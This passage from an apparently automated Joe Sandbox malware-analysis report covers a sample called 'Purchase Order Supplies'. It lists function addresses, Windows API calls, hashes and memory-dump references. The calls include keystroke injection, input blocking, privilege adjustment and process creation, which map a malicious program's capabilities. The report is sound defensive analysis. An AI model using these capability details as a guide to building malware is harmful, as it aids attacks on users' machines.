                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ClientDialogNtdllProc_Screen
                          • String ID:
                          • API String ID: 3420055661-0
                          • Opcode ID: 623893afcf22a30f4d8c9f192806655f1775aef8607359bf8973919201a0243c
                          • Instruction ID: 046dfb085689a0b0ad44c3d8bb80cad775598c76efd0aea48dd9782516367491
                          • Opcode Fuzzy Hash: 623893afcf22a30f4d8c9f192806655f1775aef8607359bf8973919201a0243c
                          • Instruction Fuzzy Hash: 1FF01D76400218BFEB049F55DC059EE7FB9FF44351F10401AF901A2160D775AA51DB70
                          Function 00CDD712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00CEC2E2,?,?,00000000,?), ref: 00CDD73F
                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00CEC2E2,?,?,00000000,?), ref: 00CDD751
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ErrorFormatLastMessage
                          • String ID:
                          • API String ID: 3479602957-0
                          • Opcode ID: 788ca88fbea3994c74cbcd8349eae23aa7680332bb5b1cfd91217240f436378c
                          • Instruction ID: 72e358b9cc412eab87e34958fdbfe339d05c036a8795e1c2fc5df6d8af9f647c
                          • Opcode Fuzzy Hash: 788ca88fbea3994c74cbcd8349eae23aa7680332bb5b1cfd91217240f436378c
                          • Instruction Fuzzy Hash: DEF0823550032DBBDB11AFA4CC49FEA776DAF49351F008155F916D6281D7309A40DBA0
                          Function 00CD4B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00CD4B89
                          • keybd_event.USER32(?,7697C0D0,?,00000000), ref: 00CD4B9C
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: InputSendkeybd_event
                          • String ID:
                          • API String ID: 3536248340-0
                          • Opcode ID: a201ec342eb27275ce6b92f2d27010d4be09463d87580ad5800a0da83a221002
                          • Instruction ID: 550b6ab332385030f69a12ed7b2f1087eb136700b47617b45d54639cc58de41d
                          • Opcode Fuzzy Hash: a201ec342eb27275ce6b92f2d27010d4be09463d87580ad5800a0da83a221002
                          • Instruction Fuzzy Hash: 91F01D7090434DAFEB058FA5C805BBE7BB5AF04305F04C40AFA65A5291D779C6169FA4
                          Function 00CCB8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CCB9EC), ref: 00CCB8C5
                          • CloseHandle.KERNEL32(?,?,00CCB9EC), ref: 00CCB8D7
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AdjustCloseHandlePrivilegesToken
                          • String ID:
                          • API String ID: 81990902-0
                          • Opcode ID: 0be79d214808a39c68df7328ada022b04fb3559803d06ceebfdd0e3c1b5d3e76
                          • Instruction ID: bb507b194f942ccd4304cc6601719443fc39043c7db84db2b47efaae1cc81832
                          • Opcode Fuzzy Hash: 0be79d214808a39c68df7328ada022b04fb3559803d06ceebfdd0e3c1b5d3e76
                          • Instruction Fuzzy Hash: E7E0B672004611BEE7262B64EC09DB77BEAEF08311B20C869F49681470DB62ACD1EB20
                          Function 00CFF594 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                          Download Yara Rule
                          APIs
                          • GetWindowLongW.USER32(?,000000EC), ref: 00CFF59C
                          • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00D0F3AD,?,?,?,?), ref: 00CFF5C6
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 2dd9c8667dd33a78a6162e4caec39b0a80098e30992eac086cce932e4a346a56
                          • Instruction ID: daa810ce440980d86c075a6caa5d647497244b632677d40fe466f1fa80ba3ccf
                          • Opcode Fuzzy Hash: 2dd9c8667dd33a78a6162e4caec39b0a80098e30992eac086cce932e4a346a56
                          • Instruction Fuzzy Hash: CBE0867010422CBBEB141F19DC19FB93B15EB00750F10851AF916C80E1D7B08591D660
                          Function 00CB8E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,00C9125D,00CB7A43,00C90F35,?,?,00000001), ref: 00CB8E41
                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00CB8E4A
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 0190dc6b1403832cf2bd562cd505f425b11946f2ba2a7745118d79f62bf528e3
                          • Instruction ID: fb516abd6a5d635130aac581781611b304d715005d66001e5cbfad069d9a2d09
                          • Opcode Fuzzy Hash: 0190dc6b1403832cf2bd562cd505f425b11946f2ba2a7745118d79f62bf528e3
                          • Instruction Fuzzy Hash: 80B09271044B08BBEA002BA1EC09BC83F6AEB08A62F008010F62D84260CF6354528AA2
                          Function 00CC113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2e07c2a3204044c32beb53fabb95e1b86f26f2d2c4a68afaf728257cd9bacf02
                          • Instruction ID: e7579aafc28592710ec8dd7acbb5c721fe3045a3765b741ee5c85098c090a1f5
                          • Opcode Fuzzy Hash: 2e07c2a3204044c32beb53fabb95e1b86f26f2d2c4a68afaf728257cd9bacf02
                          • Instruction Fuzzy Hash: 51B1E120D2AF414DD6239639DD31336B65CAFBB2D5F91D71BFC2AB4E26EB2185834180
                          Function 00D002AA Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00D00352
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 636b802f86da9762ba5c84b4822b3b8af17badf27e21167cfd2aec85404d0b22
                          • Instruction ID: 1fc22d6000f87577430e8f94fb7f29da9c91aad63ef5175b52307ea8fae4598f
                          • Opcode Fuzzy Hash: 636b802f86da9762ba5c84b4822b3b8af17badf27e21167cfd2aec85404d0b22
                          • Instruction Fuzzy Hash: E1110A31244219BBFB265B2CCC45FBD3E25E745760F288315FA5A9A1E2CAA09D01E279
                          Function 00CFE769 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAB155: GetWindowLongW.USER32(?,000000EB), ref: 00CAB166
                          • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 00CFE7AF
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$CallLongProc
                          • String ID:
                          • API String ID: 4084987330-0
                          • Opcode ID: 8bac1d1077000881fde09b36dc9a0b079b435b95d115949b1a9ebd423556f00a
                          • Instruction ID: b766112f8f931697de19c42726e7192b5df5babf36efff76a70e44b2895a498c
                          • Opcode Fuzzy Hash: 8bac1d1077000881fde09b36dc9a0b079b435b95d115949b1a9ebd423556f00a
                          • Instruction Fuzzy Hash: C6F0FF3510020CFFCF55AF55DC44DB93BA7EB05361B048515FE258A6B1CB329D61EB61
                          Function 00CFEA4E Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                            • Part of subcall function 00CAB736: GetCursorPos.USER32(000000FF), ref: 00CAB749
                            • Part of subcall function 00CAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00CAB766
                            • Part of subcall function 00CAB736: GetAsyncKeyState.USER32(00000001), ref: 00CAB78B
                            • Part of subcall function 00CAB736: GetAsyncKeyState.USER32(00000002), ref: 00CAB799
                          • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00D0F417,?,?,?,?,?,00000001,?), ref: 00CFEA9C
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                          • String ID:
                          • API String ID: 2356834413-0
                          • Opcode ID: 425d87b865abec1b2056727819c6c16abc80c79e90e29505be5daffc9ef54282
                          • Instruction ID: 861be54c00ac9b56ca753f87fceb0758986158fffd2ef0083d61d35a57768a49
                          • Opcode Fuzzy Hash: 425d87b865abec1b2056727819c6c16abc80c79e90e29505be5daffc9ef54282
                          • Instruction Fuzzy Hash: 94F0A735100329BBDF146F15CC05EBE3F61FB01755F004015FD165A2A1D7769961EBE1
                          Function 00CAB7F2 Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,00CAAF40,?,?,?,?,?), ref: 00CAB83B
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 1bfba0517584069c8fb5086bfb5f00a94540cc39e7e8310fc3d728192073d588
                          • Instruction ID: 5f6e21aed2f3d72012a751651d1e351bc1cb13e7b77798bf6def3abd228784b5
                          • Opcode Fuzzy Hash: 1bfba0517584069c8fb5086bfb5f00a94540cc39e7e8310fc3d728192073d588
                          • Instruction Fuzzy Hash: 66F05434500309AFDB289F18DC50A753BA6F705361F144219FD52873E1D771DD50DB60
                          Function 00CE703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • BlockInput.USER32(00000001), ref: 00CE7057
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: BlockInput
                          • String ID:
                          • API String ID: 3456056419-0
                          • Opcode ID: 2e63da5046c47b29844512ddff6498c619af434f163342095b873b99884330f5
                          • Instruction ID: ecb57b29c19ae544127600d9e93be0eae93bc5993ebffc18745ced7b60469ea6
                          • Opcode Fuzzy Hash: 2e63da5046c47b29844512ddff6498c619af434f163342095b873b99884330f5
                          • Instruction Fuzzy Hash: 04E04F36304214AFC710EFAAD808E96F7EDAF98750F00C42AFA45D7351DBB0E8009BA0
                          Function 00CFF3DA Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00CFF41A
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: DialogNtdllProc_
                          • String ID:
                          • API String ID: 3239928679-0
                          • Opcode ID: 60b8f33b874e72bcf7109d66bd249de9dfbfb6c99af13bd5bc06951ebd3e1342
                          • Instruction ID: ba5c6ccf2ff050c8f847887ac184e23d7034a604c3f350c4482b7ec2bf3c6cca
                          • Opcode Fuzzy Hash: 60b8f33b874e72bcf7109d66bd249de9dfbfb6c99af13bd5bc06951ebd3e1342
                          • Instruction Fuzzy Hash: 1FF06D31240359BFDB21DF58DC05FD63FA5FB06760F048418BA25672E1CB716920E765
                          Function 00CAAC99 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 00CAACC7
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: c8a7e98dfd5701593cd9b330dd36ebc9a85463b17f5ce1ad21b52ec308d2df95
                          • Instruction ID: 82b117163dca1c5256ab19de514e28abbfd9aa40986871855e690fd2f96b42dd
                          • Opcode Fuzzy Hash: c8a7e98dfd5701593cd9b330dd36ebc9a85463b17f5ce1ad21b52ec308d2df95
                          • Instruction Fuzzy Hash: C2E0B635140208BBDF15AF90DC51E683B26BB4A358F108418FA054A2A1CB33A522EB61
                          Function 00CFF425 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00D0F3D4,?,?,?,?,?,?), ref: 00CFF450
                            • Part of subcall function 00CFE13E: _memset.LIBCMT ref: 00CFE14D
                            • Part of subcall function 00CFE13E: _memset.LIBCMT ref: 00CFE15C
                            • Part of subcall function 00CFE13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D53EE0,00D53F24), ref: 00CFE18B
                            • Part of subcall function 00CFE13E: CloseHandle.KERNEL32 ref: 00CFE19D
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                          • String ID:
                          • API String ID: 2364484715-0
                          • Opcode ID: 4bed2176c430f9f7592d42d0b4e692fc8d714fd5d822f70f074f2cec0a787712
                          • Instruction ID: d237cdb868950b784c67d2e54c232eb9303cf33813c2469c90a85fcf74db1a4c
                          • Opcode Fuzzy Hash: 4bed2176c430f9f7592d42d0b4e692fc8d714fd5d822f70f074f2cec0a787712
                          • Instruction Fuzzy Hash: D6E01231100208EFCB51AF08DC04EAA3BA2FB08340F008014FA00972B2CB31A922EF52
                          Function 00CFF3AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtdllDialogWndProc_W.NTDLL ref: 00CFF3D0
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: DialogNtdllProc_
                          • String ID:
                          • API String ID: 3239928679-0
                          • Opcode ID: 604f988b1285b386717d1ffe361de54c2788ddb07436917ddeafe4c676434555
                          • Instruction ID: 4b61cffeb73e05484a85bfcf17e84fcf3da4a7ea5bc29144d3ef1d456a382579
                          • Opcode Fuzzy Hash: 604f988b1285b386717d1ffe361de54c2788ddb07436917ddeafe4c676434555
                          • Instruction Fuzzy Hash: FDE0E23820030CEFDB01DF88D844E8A3BA6FB1A350F004054FD048B362CB72A820EBB1
                          Function 00CFF37C Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtdllDialogWndProc_W.NTDLL ref: 00CFF3A1
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: DialogNtdllProc_
                          • String ID:
                          • API String ID: 3239928679-0
                          • Opcode ID: 0b28b725a5c0bee4bb7a602b180dd01dc9503272e249ba09fae8bb3a23d6af38
                          • Instruction ID: b03ca7b9616405a29de62cdf2d27c9fe67e510d1e435f4db41e77558063e55b0
                          • Opcode Fuzzy Hash: 0b28b725a5c0bee4bb7a602b180dd01dc9503272e249ba09fae8bb3a23d6af38
                          • Instruction Fuzzy Hash: 0DE0E23820430CEFDB01DF88D844E8A3BA6FB1A350F004054FD048B361CB72A820EB71
                          Function 00CAB845 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
